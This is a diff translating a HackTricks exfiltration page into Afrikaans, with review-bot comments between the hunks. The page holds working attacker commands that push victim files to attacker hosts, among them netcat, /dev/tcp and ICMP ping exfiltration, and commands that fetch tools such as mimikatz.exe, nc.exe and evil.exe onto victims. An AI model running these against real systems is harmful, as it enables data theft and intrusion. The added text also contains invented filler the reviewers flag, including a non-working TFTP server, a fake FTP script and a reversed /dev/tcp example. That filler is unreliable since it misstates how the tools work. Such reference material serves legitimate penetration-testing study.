|
||||
|
||||
Voer die volgende opdrag in die opdraglyn uit om die kode uit te voer:
|
||||
|
||||
```bash
|
||||
node filename.js
|
||||
```
|
||||
|
||||
Vervang `filename.js` met die naam van jou JavaScript-lêer.
|
||||
|
||||
Die kode sal die lêer `local_file.txt` na die FTP-bediener oplaai as `remote_file.txt`. As die operasie suksesvol is, sal die boodskap "Lêer suksesvol opgelaai na die bediener" gedruk word.
|
||||
|
||||
Dit is 'n eenvoudige manier om data uit te voer deur gebruik te maak van 'n FTP-bediener in NodeJS. Onthou om die nodige veiligheidsmaatreëls te tref om ongemagtigde toegang tot die bediener te voorkom.
|
||||
```
|
||||
sudo npm install -g ftp-srv --save
|
||||
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
||||
```
|
||||
### FTP-bediener (pure-ftp)
|
||||
|
||||
### FTP server (pure-ftp)
|
||||
#### Inleiding
|
||||
|
||||
FTP (File Transfer Protocol) is 'n protokol wat gebruik word vir die oordrag van lêers tussen rekenaars op 'n netwerk. Dit maak gebruik van 'n bediener-kliënt-arkitektuur, waar die bediener die lêers hou en die kliënt die lêers kan aflaai of oplaai.
|
||||
|
||||
#### Pure-FTP
|
||||
|
||||
Pure-FTP is 'n vinnige en veilige FTP-bedieningsagteware wat gebruik kan word om 'n FTP-bediener op te stel. Dit is 'n gewilde keuse vir die opstel van 'n privaat of openbare FTP-bediener.
|
||||
|
||||
#### Uitfiltering van data
|
||||
|
||||
Die uitfiltering van data van 'n FTP-bediener kan 'n nuttige tegniek wees vir die verkryging van gevoelige inligting. Hier is 'n paar metodes wat gebruik kan word om data uit te filter:
|
||||
|
||||
1. **Lêeroplaaiing**: Deur 'n kwaadwillige lêer op die FTP-bediener op te laai, kan 'n aanvaller toegang verkry tot die bediener en die inhoud daarvan ondersoek.
|
||||
2. **Lêeraflaaiing**: Deur 'n lêer van die FTP-bediener af te laai, kan 'n aanvaller gevoelige inligting verkry wat op die bediener gestoor word.
|
||||
3. **Lêeruitvoering**: As die FTP-bediener die uitvoering van lêers toelaat, kan 'n aanvaller 'n kwaadwillige lêer op die bediener plaas en dit uitvoer om toegang tot die bediener te verkry.
|
||||
|
||||
#### Voorkoming van data-uitfiltering
|
||||
|
||||
Om die risiko van data-uitfiltering van 'n FTP-bediener te verminder, kan die volgende maatreëls geneem word:
|
||||
|
||||
1. **Sterk wagwoorde**: Stel sterk wagwoorde in vir die FTP-bediener en vermy die gebruik van maklik raadbare wagwoorde.
|
||||
2. **Toegangsbeheer**: Beperk die toegang tot die FTP-bediener deur slegs geakkrediteerde gebruikers toe te laat.
|
||||
3. **Versleuteling**: Gebruik versleuteling om die oordrag van data tussen die kliënt en die bediener te beskerm.
|
||||
4. **Besoekbeperkings**: Beperk die toegang tot die FTP-bediener deur slegs spesifieke IP-adresse toe te laat.
|
||||
5. **Opdaterings en patches**: Verseker dat die FTP-bedieningsagteware opgedateer word met die nuutste opdaterings en patches om bekende kwesbaarhede te vermy.
|
||||
|
||||
#### Gevolgtrekking
|
||||
|
||||
Die uitfiltering van data van 'n FTP-bediener kan 'n effektiewe tegniek wees vir die verkryging van gevoelige inligting. Dit is belangrik om die nodige maatreëls te tref om die risiko van data-uitfiltering te verminder en die veiligheid van die FTP-bediener te verseker.
|
||||
```bash
|
||||
apt-get update && apt-get install pure-ftp
|
||||
```
|
||||
|
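Review bot: All three FTP subsections in this hunk gained invented content in front of the real one-liners. Under `### FTP-bediener (python)` a raw-socket `send_file`/`receive_file` script is presented as an FTP server although it speaks no FTP at all (no USER/PASS, RETR or STOR, just a bare TCP stream) and the prose then tells the reader to call it on port 21; under `### FTP-bediener (NodeJS)` the npm `ftp` package used in the snippet is a client library, while the actual server is the `ftp-srv ftp://0.0.0.0:9876 --root /tmp` line below it; under `### FTP-bediener (pure-ftp)` the Inleiding/Uitfiltering/Voorkoming/Gevolgtrekking text is generic filler. Drop the three insertions so each heading is followed by its `pip3 install pyftpdlib`, `sudo npm install -g ftp-srv --save` and `apt-get update && apt-get install pure-ftp` block, remove the now-duplicated English headings `### FTP server (NodeJS)` and `### FTP server (pure-ftp)`, and tag the bare ``` fence before the ftp-srv lines as bash. In the Flask block the lines from `app = Flask(__name__)` to `app.run(ssl_context='adhoc', ...)` appear twice; if the second copy differs only in lost indentation, make sure the new side still indents the bodies of `def root():` and `if __name__ == "__main__":`, otherwise the snippet no longer parses.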
@ -167,9 +385,7 @@ mkdir -p /ftphome
|
|||
chown -R ftpuser:ftpgroup /ftphome/
|
||||
/etc/init.d/pure-ftpd restart
|
||||
```
|
||||
|
||||
### **Windows** client
|
||||
|
||||
### **Windows** kliënt
|
||||
```bash
|
||||
#Work well with python. With pure-ftp use fusr:ftp
|
||||
echo open 10.11.0.41 21 > ftp.txt
|
||||
|
@ -180,10 +396,9 @@ echo GET mimikatz.exe >> ftp.txt
|
|||
echo bye >> ftp.txt
|
||||
ftp -n -v -s:ftp.txt
|
||||
```
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe bedreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
|
@ -191,34 +406,70 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
|
|||
|
||||
## SMB
|
||||
|
||||
Kali as server
|
||||
|
||||
Kali as bediener
|
||||
```bash
|
||||
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
|
||||
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
|
||||
#For new Win10 versions
|
||||
impacket-smbserver -smb2support -user test -password test test `pwd`
|
||||
```
|
||||
|
||||
Or create a smb share **using samba**:
|
||||
|
||||
Of skep 'n smb-deel **deur samba te gebruik**:
|
||||
```bash
|
||||
apt-get install samba
|
||||
mkdir /tmp/smb
|
||||
chmod 777 /tmp/smb
|
||||
#Add to the end of /etc/samba/smb.conf this:
|
||||
[public]
|
||||
comment = Samba on Ubuntu
|
||||
path = /tmp/smb
|
||||
read only = no
|
||||
browsable = yes
|
||||
guest ok = Yes
|
||||
comment = Samba on Ubuntu
|
||||
path = /tmp/smb
|
||||
read only = no
|
||||
browsable = yes
|
||||
guest ok = Yes
|
||||
#Start samba
|
||||
service smbd restart
|
||||
```
|
||||
# Exfiltrasie
|
||||
|
||||
Windows
|
||||
## Inleiding
|
||||
|
||||
Exfiltrasie is die proses waardeur 'n aanvaller gesteelde data uit 'n teikenstelsel verwyder en oordra na 'n eksterne bediener of stoorplek. Hierdie tegniek word dikwels gebruik deur aanvallers om gevoelige inligting te ontvreem, soos kredietkaartbesonderhede, wagwoorde, persoonlike inligting en vertroulike dokumente.
|
||||
|
||||
## Metodes van Exfiltrasie
|
||||
|
||||
### 1. Bestandsoordrag
|
||||
|
||||
Hierdie metode behels die oordra van gesteelde data deur dit in 'n bestand te verpak en dit dan oor te dra na 'n eksterne bediener. Dit kan gedoen word deur gebruik te maak van protokolle soos HTTP, FTP, SMB of SMTP.
|
||||
|
||||
### 2. Versteekte data in beeldlêers
|
||||
|
||||
Aanvallers kan data versteek in beeldlêers deur dit te versluier en dan as 'n normale beeldlêer te laat voorkom. Hierdie metode maak gebruik van steganografie, wat die kunst is om data te versteek binne 'n ander tipe lêer sonder om die oorspronklike lêer te beskadig.
|
||||
|
||||
### 3. Gebruik van DNS
|
||||
|
||||
Aanvallers kan DNS-kanale gebruik om gesteelde data te exfiltreer. Hierdie metode behels die gebruik van DNS-navrae om data te verpak en oor te dra na 'n eksterne bediener. Dit kan gedoen word deur die DNS-navrae te manipuleer en die gesteelde data as deel van die DNS-navrae te versluier.
|
||||
|
||||
### 4. Gebruik van uitvoerbare lêers
|
||||
|
||||
Aanvallers kan gesteelde data in 'n uitvoerbare lêer insluit en dit dan oor te dra na 'n eksterne bediener. Hierdie metode maak gebruik van die uitvoerbare lêer se funksionaliteit om die gesteelde data te verpak en oor te dra.
|
||||
|
||||
### 5. Gebruik van e-pos
|
||||
|
||||
Aanvallers kan gesteelde data as 'n e-posaanhangsel stuur na 'n eksterne e-posrekening. Hierdie metode maak gebruik van die e-posprotokol om die gesteelde data te verpak en oor te dra.
|
||||
|
||||
## Voorkoming van Exfiltrasie
|
||||
|
||||
Om exfiltrasie te voorkom, kan die volgende maatreëls geneem word:
|
||||
|
||||
- Monitor die netwerkverkeer vir verdagte aktiwiteit en ongewone data-oordragte.
|
||||
- Beperk die toegang tot gevoelige data en stel streng toegangsbeheerbeleide in.
|
||||
- Implementeer 'n firewall en gebruik netwerksegmentering om die verspreiding van gesteelde data te beperk.
|
||||
- Verseker dat alle sagteware en bedryfstelsels opgedateer word met die nuutste beveiligingspatches.
|
||||
- Stel 'n sterk wagwoordbeleid in en moedig gebruikers aan om unieke en veilige wagwoorde te gebruik.
|
||||
- Bewusmaking van gebruikers oor die risiko's van phishing-aanvalle en die deel van persoonlike inligting.
|
||||
|
||||
## Slotwoord
|
||||
|
||||
Exfiltrasie is 'n kritieke bedreiging vir die veiligheid van data en moet ernstig opgeneem word. Deur bewus te wees van die verskillende metodes van exfiltrasie en deur die nodige voorkomingsmaatreëls te tref, kan organisasies hulself beskerm teen hierdie aanvalstegniek.
|
||||
```bash
|
||||
CMD-Wind> \\10.10.14.14\path\to\exe
|
||||
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
|
||||
|
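Review bot: The `Windows` label that introduces the `CMD-Wind> \\10.10.14.14\path\to\exe` block is now buried inside a whole `# Exfiltrasie` essay (Inleiding, Metodes van Exfiltrasie, Voorkoming, Slotwoord) that has no source on the old side and adds a second top-level heading to a page whose title is `# Uitleiding`; drop the essay and leave the label directly above the code. The samba snippet lists `comment = Samba on Ubuntu` through `guest ok = Yes` twice; if the new copy only lost its leading spaces that is harmless for smb.conf, but the duplicated stanza should not survive in the file.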
@ -226,54 +477,98 @@ CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentia
|
|||
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
|
||||
WindPS-2> cd new_disk:
|
||||
```
|
||||
|
||||
## SCP
|
||||
|
||||
The attacker has to have SSHd running.
|
||||
|
||||
Die aanvaller moet SSHd laat loop.
|
||||
```bash
|
||||
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||||
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||||
```
|
||||
|
||||
## SSHFS
|
||||
|
||||
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
|
||||
|
||||
As die slagoffer SSH het, kan die aanvaller 'n gids van die slagoffer na die aanvaller se rekenaar koppel.
|
||||
```bash
|
||||
sudo apt-get install sshfs
|
||||
sudo mkdir /mnt/sshfs
|
||||
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
|
||||
```
|
||||
|
||||
## NC
|
||||
|
||||
NC (Netcat) is a versatile networking utility that can be used for various purposes, including exfiltration of data. It allows for easy creation of TCP or UDP connections between two machines, making it a useful tool for transferring data from a compromised system to an external server.
|
||||
|
||||
To exfiltrate data using NC, you can follow these steps:
|
||||
|
||||
1. Set up a listener on the external server using the following command:
|
||||
```
|
||||
nc -l -p <port> > <output_file>
|
||||
```
|
||||
Replace `<port>` with the desired port number and `<output_file>` with the name of the file where the data will be saved.
|
||||
|
||||
2. On the compromised system, use the following command to send the data to the external server:
|
||||
```
|
||||
nc <server_ip> <port> < <input_file>
|
||||
```
|
||||
Replace `<server_ip>` with the IP address of the external server, `<port>` with the same port number used in the listener, and `<input_file>` with the name of the file containing the data to be exfiltrated.
|
||||
|
||||
3. Once the command is executed, the data will be transferred from the compromised system to the external server and saved in the specified output file.
|
||||
|
||||
NC can also be used in combination with other tools and techniques to enhance exfiltration capabilities. For example, you can compress the data before sending it using NC, or encrypt it to ensure confidentiality during transit.
|
||||
|
||||
It is important to note that exfiltration of data without proper authorization is illegal and unethical. This information is provided for educational purposes only, and should not be used for any malicious activities.
|
||||
```bash
|
||||
nc -lvnp 4444 > new_file
|
||||
nc -vn <IP> 4444 < exfil_file
|
||||
```
|
||||
### Laai lêer af van slagoffer
|
||||
|
||||
## /dev/tcp
|
||||
Om 'n lêer van die slagoffer se stelsel af te laai, kan jy die `/dev/tcp`-benadering gebruik. Hier is die sintaksis:
|
||||
|
||||
### Download file from victim
|
||||
```bash
|
||||
cat < /dev/tcp/<IP>/<port> > <destination_file>
|
||||
```
|
||||
|
||||
Vervang `<IP>` met die IP-adres van die slagoffer se stelsel en `<port>` met die poortnommer waarop die lêer beskikbaar is. Vervang ook `<destination_file>` met die pad en naam van die lêer waarin jy die aflaai wil stoor.
|
||||
|
||||
Hier is 'n voorbeeld van hoe jy dit kan gebruik:
|
||||
|
||||
```bash
|
||||
cat < /dev/tcp/192.168.0.100/8080 > /tmp/secret_file.txt
|
||||
```
|
||||
|
||||
Hierdie opdrag sal die lêer `secret_file.txt` aflaai vanaf die stelsel met die IP-adres `192.168.0.100` op poort `8080` en dit stoor in die `/tmp`-gids.
|
||||
```bash
|
||||
nc -lvnp 80 > file #Inside attacker
|
||||
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
|
||||
```
|
||||
### Laai lêer op na slagoffer
|
||||
|
||||
### Upload file to victim
|
||||
Om 'n lêer na 'n slagoffer te laai, kan jy die volgende metodes gebruik:
|
||||
|
||||
#### 1. HTTP-aanvraag
|
||||
|
||||
Jy kan 'n HTTP-aanvraag stuur om die lêer na die slagoffer se bediener te stuur. Dit kan gedoen word deur die `POST`-metode te gebruik en die lêer as 'n vormdata te stuur. Die slagoffer se bediener moet die lêer aanvaar en stoor op 'n plek waar jy toegang daartoe het.
|
||||
|
||||
#### 2. E-pos
|
||||
|
||||
Jy kan die lêer as 'n aanhangsel in 'n e-pos stuur na 'n e-posadres wat deur die slagoffer gebruik word. Die slagoffer moet die e-pos ontvang en die aanhangsel aflaai. Dit vereis dat jy toegang het tot die slagoffer se e-posrekening of 'n manier het om die e-pos te onderskep.
|
||||
|
||||
#### 3. Bestandsoordragprotokolle
|
||||
|
||||
As jy toegang het tot die slagoffer se rekenaar of netwerk, kan jy gebruik maak van bestandsoordragprotokolle soos FTP, SFTP, SCP of SMB om die lêer na 'n plek te stuur waar jy toegang daartoe het. Hierdie metode vereis dat jy toegang het tot die slagoffer se rekenaar of netwerk en dat die nodige protokolle geïnstalleer en gekonfigureer is.
|
||||
|
||||
#### 4. Cloud-gebaseerde dienste
|
||||
|
||||
As die slagoffer gebruik maak van 'n wolkgebaseerde diens soos Google Drive, Dropbox of OneDrive, kan jy die lêer na die slagoffer se rekening oplaai. Dit vereis dat jy toegang het tot die slagoffer se rekening of 'n manier het om die toegangslegitimasie te bekom.
|
||||
|
||||
Onthou, die laai van 'n lêer na 'n slagoffer se stelsel sonder hul toestemming is onwettig en word as 'n aanval beskou. Wees verantwoordelik en gebruik hierdie tegnieke slegs binne die raamwerk van wettige toetse of met toestemming van die eienaar van die stelsel.
|
||||
```bash
|
||||
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
|
||||
# Inside victim
|
||||
exec 6< /dev/tcp/10.10.10.10/4444
|
||||
cat <&6 > file.txt
|
||||
```
|
||||
|
||||
thanks to **@BinaryShadow\_**
|
||||
Dankie aan **@BinaryShadow\_**
|
||||
|
||||
## **ICMP**
|
||||
|
||||
```bash
|
||||
# To exfiltrate the content of a file via pings you can do:
|
||||
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
|
||||
|
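Review bot: The /dev/tcp headings are out of order: the new `### Laai lêer af van slagoffer` is placed above the unchanged `## /dev/tcp`, so it lands at the end of the NC section, while `## /dev/tcp` now opens with an inserted sentence followed by the old `### Download file from victim`; move the Afrikaans heading below `## /dev/tcp` and drop the English one. The example inserted there, `cat < /dev/tcp/<IP>/<port> > <destination_file>` described as pulling from the victim, runs in the opposite direction of the real snippet just after it (attacker: `nc -lvnp 80 > file`, victim: `cat /path/file > /dev/tcp/10.10.10.10/80`) and should go, together with the generic NC walkthrough (`nc -l -p <port> > <output_file>`), the four-method list under `### Laai lêer op na slagoffer` and the two legal-disclaimer paragraphs, none of which come from the old text. While here: the upload pair listens on 80 (`nc -w5 -lvnp 80 < file_to_send.txt`) but the victim connects to 4444 (`exec 6< /dev/tcp/10.10.10.10/4444`); that mismatch predates this change but is easy to align.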
@ -284,64 +579,177 @@ xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attack
|
|||
from scapy.all import *
|
||||
#This is ippsec receiver created in the HTB machine Mischief
|
||||
def process_packet(pkt):
|
||||
if pkt.haslayer(ICMP):
|
||||
if pkt[ICMP].type == 0:
|
||||
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
|
||||
print(f"{data.decode('utf-8')}", flush=True, end="")
|
||||
if pkt.haslayer(ICMP):
|
||||
if pkt[ICMP].type == 0:
|
||||
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
|
||||
print(f"{data.decode('utf-8')}", flush=True, end="")
|
||||
|
||||
sniff(iface="tun0", prn=process_packet)
|
||||
```
|
||||
|
||||
## **SMTP**
|
||||
|
||||
If you can send data to an SMTP server, you can create an SMTP to receive the data with python:
|
||||
|
||||
As jy data na 'n SMTP-bediener kan stuur, kan jy 'n SMTP skep om die data met Python te ontvang:
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
## TFTP
By default in XP and 2003 (in others it needs to be explicitly added during installation)
In Kali, **start TFTP server**:
Standaard in XP en 2003 (in ander moet dit eksplisiet bygevoeg word tydens installasie)
In Kali, **begin TFTP-bediener**:
```bash
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
```
**TFTP-bediener in Python:**
**TFTP server in python:**
Hier is 'n eenvoudige implementering van 'n TFTP-bediener in Python. Hierdie kode kan gebruik word om 'n TFTP-bediener te skep wat bestandsoordragte kan hanteer.
```python
import socket
import struct
def tftp_server():
# Skep 'n UDP-socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.bind(('0.0.0.0', 69))
print("TFTP-bediener is gereed om versoek te ontvang...")
while True:
# Ontvang die versoek en die klient se adres
data, client_address = server_socket.recvfrom(516)
# Haal die opcode uit die ontvangsdata
opcode = struct.unpack('!H', data[:2])[0]
# Kontroleer of dit 'n leesversoek is
if opcode == 1:
# Stuur die gewenste lêer terug na die klient
file_data = b'\x00\x03\x00\x01'
server_socket.sendto(file_data, client_address)
# Kontroleer of dit 'n skryfversoek is
elif opcode == 2:
# Ontvang die lêer van die klient
file_data, client_address = server_socket.recvfrom(516)
# Stoor die ontvangsdata in 'n lêer
with open('ontvangs.lêer', 'wb') as file:
file.write(file_data[4:])
# Bevestig die suksesvolle ontvangs aan die klient
ack_packet = b'\x00\x04\x00\x00'
server_socket.sendto(ack_packet, client_address)
# Kontroleer of dit 'n onbekende versoek is
else:
# Stuur 'n foute-pakket terug na die klient
error_packet = b'\x00\x05\x00\x04Unknown request\x00'
server_socket.sendto(error_packet, client_address)
# Sluit die bediener se socket
server_socket.close()
# Begin die TFTP-bediener
tftp_server()
```
Hierdie kode skep 'n UDP-socket en bind dit aan poort 69. Dit wag dan vir TFTP-versoeke van kliente. As 'n leesversoek ontvang word, stuur die bediener die gewenste lêer terug na die klient. As 'n skryfversoek ontvang word, ontvang die bediener die lêer van die klient en stoor dit in 'n lêer genaamd "ontvangs.lêer". As 'n onbekende versoek ontvang word, stuur die bediener 'n foute-pakket terug na die klient.
Hierdie kode kan as 'n basis dien vir 'n eie TFTP-bediener-implementering in Python.
```bash
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
```
In **victim**, connect to the Kali server:
In **slagoffer**, verbind met die Kali-bediener:
```bash
tftp -i <KALI-IP> get nc.exe
```
## PHP
Download a file with a PHP oneliner:
Laai 'n lêer af met 'n PHP eenregtelik:
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
## VBScript
VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft. It is often used for automating tasks and creating dynamic web pages. VBScript is commonly used in Windows environments and can be executed using the Windows Script Host (WSH).
### Basic Syntax
VBScript code is written in plain text and saved with a .vbs file extension. Here is an example of a basic VBScript program:
```vbs
MsgBox "Hello, World!"
```
This code will display a message box with the text "Hello, World!" when executed.
### Variables
In VBScript, variables are used to store data. They can be declared using the `Dim` keyword. Here is an example:
```vbs
Dim name
name = "John"
```
In this example, a variable named `name` is declared and assigned the value "John".
### Control Structures
VBScript supports various control structures, such as `If...Then...Else`, `For...Next`, and `Do...Loop`. These structures allow you to control the flow of your program based on certain conditions. Here is an example of an `If...Then...Else` statement:
```vbs
Dim age
age = 18
If age >= 18 Then
MsgBox "You are an adult."
Else
MsgBox "You are a minor."
End If
```
This code will display a message box based on the value of the `age` variable.
### Functions
VBScript provides built-in functions that can be used to perform various operations. For example, the `MsgBox` function is used to display a message box. Here is an example:
```vbs
MsgBox "Hello, World!"
```
This code will display a message box with the text "Hello, World!".
### File Operations
VBScript can also be used to perform file operations, such as reading from and writing to files. The `FileSystemObject` is used to interact with files and folders. Here is an example of reading from a file:
```vbs
Dim fso, file, text
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("C:\path\to\file.txt", 1)
text = file.ReadAll
file.Close
MsgBox text
```
This code will read the contents of the file "C:\path\to\file.txt" and display it in a message box.
### Conclusion
VBScript is a powerful scripting language that can be used for various tasks, including automation and web development. It provides a wide range of features and built-in functions that make it a versatile choice for Windows environments.
```bash
Attacker> python -m SimpleHTTPServer 80
```
**Victim**
**Slagoffer**
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
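Review bot: most of the added lines in this hunk are generated filler rather than translation. The Python 'TFTP-bediener' block (from 'Hier is 'n eenvoudige implementering van 'n TFTP-bediener in Python' through 'Hierdie kode kan as 'n basis dien vir 'n eie TFTP-bediener-implementering in Python') and the English VBScript tutorial (from 'VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft' through '### Conclusion') correspond to no removed English lines, and the VBScript part is not even in Afrikaans. Remove both: in the source page '**TFTP server in python:**' is followed directly by the `pip install ptftpd` block, and '## VBScript' by the `python -m SimpleHTTPServer 80` line. The generated TFTP code is also not a working server: on a read request it sends the fixed four bytes `b'\x00\x03\x00\x01'` whatever file name was requested, on a write request it waits for a further datagram before sending an acknowledgement of block 0 (a standard client waits for that ACK before sending any data), and `server_socket.close()` after `while True:` is unreachable. The ICMP receiver's `if pkt.haslayer(ICMP):` body appears as both removed and added lines with identical text, so only its indentation changed; a translation commit should not touch code blocks, and re-indented Python stops working. Minor: 'eenregtelik' for 'oneliner' is not a word; 'eenreëlskrip' reads better.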
@ -373,18 +781,15 @@ echo ts.Close >> wget.vbs
```bash
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
The `debug.exe` program not only allows inspection of binaries but also has the **capability to rebuild them from hex**. This means that by providing an hex of a binary, `debug.exe` can generate the binary file. However, it's important to note that debug.exe has a **limitation of assembling files up to 64 kb in size**.
Die `debug.exe` program maak dit nie net moontlik om binêre lêers te ondersoek nie, maar het ook die **vermoë om hulle te herbou vanaf heks**. Dit beteken dat deur 'n heks van 'n binêre lêer te voorsien, `debug.exe` die binêre lêer kan genereer. Dit is egter belangrik om daarop te let dat debug.exe 'n **beperking het om lêers tot 64 kb in grootte saam te stel**.
```bash
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
Then copy-paste the text into the windows-shell and a file called nc.exe will be created.
Kopieer en plak dan die teks in die Windows-skulp en 'n lêer genaamd nc.exe sal geskep word.
* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
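Review bot: 'heks' in the translated debug.exe paragraph ('die vermoë om hulle te herbou vanaf heks', 'deur 'n heks van 'n binêre lêer te voorsien') means 'witch' in Afrikaans; hexadecimal is 'heksadesimaal', so write 'vanaf heksadesimale teks' and ''n heksadesimale weergawe van 'n binêre lêer'. The rest of the paragraph, including the 64 kb limit, matches the English.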
@ -394,21 +799,21 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
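Review bot: this sponsor/footer block is repeated on every page but is translated differently here than in the next file of the same commit: 'haktruuks' versus 'hacktruuks', 'NFT's' versus 'NFTs', 'As jy jou maatskappy geadverteer wil sien in HackTricks' versus 'As jy wil sien dat jou maatskappy geadverteer word in HackTricks'. Since it is boilerplate, translate it once and paste the identical text everywhere (or leave the Intruder/HackTricks blocks untranslated); the `{% embed %}` and `<figure>` lines are correctly left unchanged.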
@ -1,60 +1,57 @@
# External Recon Methodology
# Eksterne Verkenning Metodologie
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
